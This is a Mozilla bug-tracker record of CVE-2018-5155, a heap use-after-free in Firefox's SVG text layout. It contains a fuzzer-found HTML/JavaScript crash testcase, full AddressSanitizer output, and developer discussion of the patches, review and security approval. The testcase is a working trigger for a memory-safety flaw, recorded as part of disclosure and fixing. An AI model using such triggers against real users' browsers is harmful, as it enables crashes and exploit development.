1448774 - (CVE-2018-5155) heap-use-after-free in mozilla::CharIterator::GetOriginalGlyphOffsets

Status: VERIFIED FIXED

(Core :: SVG, defect)

Description

[Nils]

Attachment: svg.svg

The following testcase crashes the latest ASAN build of Firefox 61.0a1 (SourceStamp=b4aeb99d1cb601e5a5288ca05630913fa8528a1c). It requires the attached svg.svg in the same directory.

crash.html:
<script>
function start() {
	o100=window.open('svg.svg','p58','height=6');
	o100.onload=fun0;
	setTimeout(fun1, 400);
}
function fun0(e) {
	o101=e.target;;
	o109=o101.getElementById('id1');
	o120=o101.getElementById('id8');
}
function fun1() {
	o167=o109.ownerDocument;
	o168=document.createElement('head');
	o167.documentElement.appendChild(o168);
	o120.setAttribute('width','393216');
	o206=document.createElement('head');
	o167.documentElement.appendChild(o206);
	o207=document.createElement('style');
	o206.appendChild(o207);
	o207.textContent="*{ -moz-transition: 235ms; -moz-border-end-color: green; border-right-style: inset";
	setTimeout(fun2,240);
}
function fun2() {
	o120.setAttribute('viewBox','0 0 1000 1000');
	o5=document.createElement("div");
	o5.innerHTML="<svg height='10px' xmlns='http://www.w3.org/2000/svg'><set attributeName='font-weight'><style>*{{}}*{ background-position-x: 1px";
	o168.innerHTML=o5.innerHTML;
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==15139==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000131768 at pc 0x7fa844a5c5d0 bp 0x7ffdd01c31d0 sp 0x7ffdd01c31c8
READ of size 8 at 0x612000131768 thread T0 (file:// Content)
    #0 0x7fa844a5c5cf in IsClusterStart /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16
    #1 0x7fa844a5c5cf in mozilla::CharIterator::GetOriginalGlyphOffsets(unsigned int&, unsigned int&) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2596
    #2 0x7fa844a5c6ea in mozilla::CharIterator::GetGlyphAdvance(nsPresContext*) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2618:3
    #3 0x7fa844a7bfee in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5108:12
    #4 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #5 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #6 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #7 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&, nsIFrame const*, bool*, mozilla::Maybe<mozilla::gfx::Matrix4x4TypedFlagged<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> >*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #8 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #9 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #10 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #11 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #12 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #13 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #14 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #15 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #16 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #17 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #18 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #19 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #20 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #21 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #22 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #23 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #24 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #25 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #26 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25
    #27 0x7fa83d2527c1 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2065:17
    #28 0x7fa83d253fbc in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1911:5
    #29 0x7fa83d254618 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1944:15
    #30 0x7fa83c382568 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1096:14
    #31 0x7fa83c39e8d0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #32 0x7fa83d25d396 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #33 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #34 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #35 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #36 0x7fa843e3379a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #37 0x7fa8480e478b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #38 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #39 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #40 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #41 0x7fa8480e416a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #42 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #43 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #44 0x7fa85c0be82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #45 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)

0x612000131768 is located 40 bytes inside of 288-byte region [0x612000131740,0x612000131860)
freed by thread T0 (file:// Content) here:
    #0 0x4c1952 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fa8448e7b61 in ClearTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.h:626:5
    #2 0x7fa8448e7b61 in nsTextFrame::MarkIntrinsicISizesDirty() /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8530
    #3 0x7fa8443eeb38 in mozilla::PresShell::FrameNeedsReflow(nsIFrame*, nsIPresShell::IntrinsicDirty, nsFrameState, nsIPresShell::ReflowRootHandling) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:2797:18
    #4 0x7fa84443f14d in StyleChangeReflow /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1234:26
    #5 0x7fa84443f14d in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1559
    #6 0x7fa84444d8f5 in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1188:9
    #7 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1264:3
    #8 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:43
    #9 0x7fa844406ffd in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4259
    #10 0x7fa83f3e33c8 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #11 0x7fa83f3e33c8 in nsIDocument::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7649
    #12 0x7fa8438218af in nsSMILAnimationController::DoSample(bool) /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.cpp:440:15
    #13 0x7fa84337257b in Resample /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:74:21
    #14 0x7fa84337257b in FlushResampleRequests /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:90
    #15 0x7fa84337257b in FlushAnimations /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:2677
    #16 0x7fa84337257b in nsSVGEnum::DOMAnimatedEnum::AnimVal() /builds/worker/workspace/build/src/dom/svg/nsSVGEnum.h:97
    #17 0x7fa844a7bf5d in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5099:31
    #18 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #19 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #20 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #21 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&, nsIFrame const*, bool*, mozilla::Maybe<mozilla::gfx::Matrix4x4TypedFlagged<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> >*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #22 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #23 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #24 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #25 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #26 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #27 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #28 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #29 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #30 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #31 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #32 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #33 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #34 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #35 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #36 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #37 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #38 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #39 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #40 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25

previously allocated by thread T0 (file:// Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fa83ec6d177 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) /builds/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:128:21
    #2 0x7fa8448a771a in Create /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:51:19
    #3 0x7fa8448a771a in MakeTextRun /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:114
    #4 0x7fa8448a771a in nsTransformingTextRunFactory::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, gfxFontGroup*, mozilla::gfx::ShapedTextFlags, nsTextFrameUtils::Flags, nsTArray<RefPtr<nsTransformedCharStyle> >&&, bool) /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:131
    #5 0x7fa8448a1fb7 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2396:38
    #6 0x7fa84489b718 in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1699:17
    #7 0x7fa8448ac9a7 in BuildTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1625:11
    #8 0x7fa8448ac9a7 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2864
    #9 0x7fa8448eadac in nsTextFrame::AddInlinePrefISizeForFlow(gfxContext*, nsIFrame::InlinePrefISizeData*, nsTextFrame::TextRunType) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8728:5
    #10 0x7fa8448ecafa in nsTextFrame::AddInlinePrefISize(gfxContext*, nsIFrame::InlinePrefISizeData*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8864:10
    #11 0x7fa84462c5fe in nsBlockFrame::GetPrefISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:860:16
    #12 0x7fa844a80936 in SVGTextFrame::DoReflow() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5520:29
    #13 0x7fa844a67e96 in MaybeReflowAnonymousBlockChild /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5475:5
    #14 0x7fa844a67e96 in SVGTextFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:3772
    #15 0x7fa844a68fc9 in nsSVGDisplayContainerFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/nsSVGContainerFrame.cpp:350:17
    #16 0x7fa844ace528 in nsSVGOuterSVGFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/svg/nsSVGOuterSVGFrame.cpp:455:14
    #17 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #18 0x7fa8446937bd in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:713:5
    #19 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #20 0x7fa844770818 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:554:3
    #21 0x7fa844771c39 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:677:3
    #22 0x7fa844775c18 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1054:3
    #23 0x7fa84461551e in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:984:14
    #24 0x7fa844614099 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:335:7
    #25 0x7fa8443f3681 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8838:11
    #26 0x7fa8444090d0 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9011:24
    #27 0x7fa8444074f3 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4309:11
    #28 0x7fa844396ecd in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #29 0x7fa844396ecd in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1939
    #30 0x7fa8443a1354 in nsRefreshDriver::FinishedWaitingForTransaction() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2163:5
    #31 0x7fa83e9422b3 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:532:32
    #32 0x7fa8436ffd1b in mozilla::dom::TabChild::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:3127:7
    #33 0x7fa83ea3449a in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:548:14
    #34 0x7fa83d9f9e09 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1401:20

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16 in IsClusterStart
Shadow bytes around the buggy address:
  0x0c248001e290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c248001e2b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e2c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
=>0x0c248001e2e0: fa fa fa fa fa fa fa fa fd fd fd fd fd[fd]fd fd
  0x0c248001e2f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e300: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c248001e310: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e320: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e330: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15139==ABORTING

Comment 1

[Nils]

Attachment: ASAN output

Comment 2

[Nils]

Attachment: crash.html (minimised testcase)

Comment 3

[Robert Longson [:longsonr]]

Attachment: patch

Well I copied the lengthAdjust mechanism to get the side attribute but that code was incorrect as it flushed animations. So although this particular exploit was introduced by bug 1446650, it must be possible to create a similar exploit via the lengthadjust attribute too and that exploit would exist in prior releases.

Comment 4

[Robert Longson [:longsonr]]

Attachment: The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

Comment 5

[Robert Longson [:longsonr]]

Attachment: auditing svg layout reveals one other dangerous call

Comment 6

[Daniel Holbert [:dholbert]]

Can you clarify what the patches are doing & why that helps? It looks like you're switching to use EnumAttributes() rather than a direct accessor, but it's not obvious to me what the significance of that is.

Comment 7

[Robert Longson [:longsonr]]

The patches get the animated value without flushing animations. Compare the new way

https://dxr.mozilla.org/mozilla-central/source/dom/svg/nsSVGEnum.h?q=nsSVGEnum.h&redirect_type=direct#53

with the old one.

https://dxr.mozilla.org/mozilla-central/source/dom/svg/nsSVGEnum.h?q=nsSVGEnum.h&redirect_type=direct#94

Comment 8

[Daniel Holbert [:dholbert]]

Comment on attachment 8962523 [details] [diff] [review]
patch

Review of attachment 8962523 [details] [diff] [review]:
-----------------------------------------------------------------

I see - thank you.

r=me

Comment 9

[Daniel Holbert [:dholbert]]

Comment on attachment 8962555 [details] [diff] [review]
auditing svg layout reveals one other dangerous call

Review of attachment 8962555 [details] [diff] [review]:
-----------------------------------------------------------------

This seems fine; r=me

You might want to shift code between these patches, though, so that one patch is Nightly-only (the textPath "side" stuff) and the other patch has everything else.

(Also, do remember to request sec-approval before landing anything here.)

Comment 10

[Robert Longson [:longsonr]]

Comment on attachment 8962555 [details] [diff] [review]
auditing svg layout reveals one other dangerous call

bug 1443092 just landed a functionally identical fix for this so it clearly was exploitable. Just the SVGTextFrame changes remain here then.

Comment 11

[Robert Longson [:longsonr]]

Attachment: The parts of the dholbert reviewed patch above that are nightly only

Comment 12

[Robert Longson [:longsonr]]

Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

[Security approval request comment]
How easily could an exploit be constructed based on the patch? I assume fairly easily even though there's no reproducing testcase.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? Would probably land without any checkin comment except for the bug number.

Which older supported branches are affected by this flaw? all of them.

If not all supported branches, which bug introduced the flaw? bug 569722

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? Should apply everywhere

How likely is this patch to cause regressions; how much testing does it need? Highly unlikely. It's straightforward and the same fix functionally as bug 1443092

Note that I've done the auditing requested in bug 1443092 comment 16

Comment 13

[Robert Longson [:longsonr]]

Comment on attachment 8963011 [details] [diff] [review]
The parts of the dholbert reviewed patch above that are nightly only

[Security approval request comment]
How easily could an exploit be constructed based on the patch? Presumably pretty easily given that this bug includes a reproducing testcase.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? not really, I'd probably land with just the bug number.

Which older supported branches are affected by this flaw? nightly only

If not all supported branches, which bug introduced the flaw? bug 1446650

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? no backports required, no branches affected

How likely is this patch to cause regressions; how much testing does it need? Highly unlikely to cause regressions (especially as this is a new feature).

Comment 14

[Al Billings [:abillings - ex-MoCo]]

Comment on attachment 8963011 [details] [diff] [review]
The parts of the dholbert reviewed patch above that are nightly only

sec-approval+ for both parts here. Let's make sure the Beta and ESR52 affecting patches get nominations for those branches as well.

Comment 15

[Robert Longson [:longsonr]]

https://hg.mozilla.org/integration/mozilla-inbound/rev/edfd9ffbd7208ef0a59f40a0d77d8dd53c905cb9

Comment 16

[Robert Longson [:longsonr]]

https://hg.mozilla.org/integration/mozilla-inbound/rev/dd2e77e4957e8525e8f277a50aadbfb7e0ffde62

Comment 17

[Ryan VanderMeulen [:RyanVM]]

https://hg.mozilla.org/mozilla-central/rev/edfd9ffbd720
https://hg.mozilla.org/mozilla-central/rev/dd2e77e4957e

Go ahead and do the branch approval requests when you're comfortable doing so :)

Comment 18

[Robert Longson [:longsonr]]

Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

Approval Request Comment
[Feature/Bug causing the regression]: bug 569722
[User impact if declined]: I think this is an exploitable security issue given how similar this code is to bug 1443092 and this bug's actual exploit
[Is this code covered by automated tests?]: yes
[Has the fix been verified in Nightly?]: yes
[Needs manual test from QE? If yes, steps to reproduce]:  no
[List of other uplifts needed for the feature/fix]: bug 1443092 (although that has already landed)
[Is the change risky?]: no
[Why is the change risky/not risky?]: bug 569722 has automated tests. It's a small targetted fix
[String changes made/needed]: none

Comment 19

[Ryan VanderMeulen [:RyanVM]]

Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

Approved for 60.0b9 and ESR 52.8.

Comment 20

[Ryan VanderMeulen [:RyanVM]]

https://hg.mozilla.org/releases/mozilla-beta/rev/3784b22ec536

Comment 21

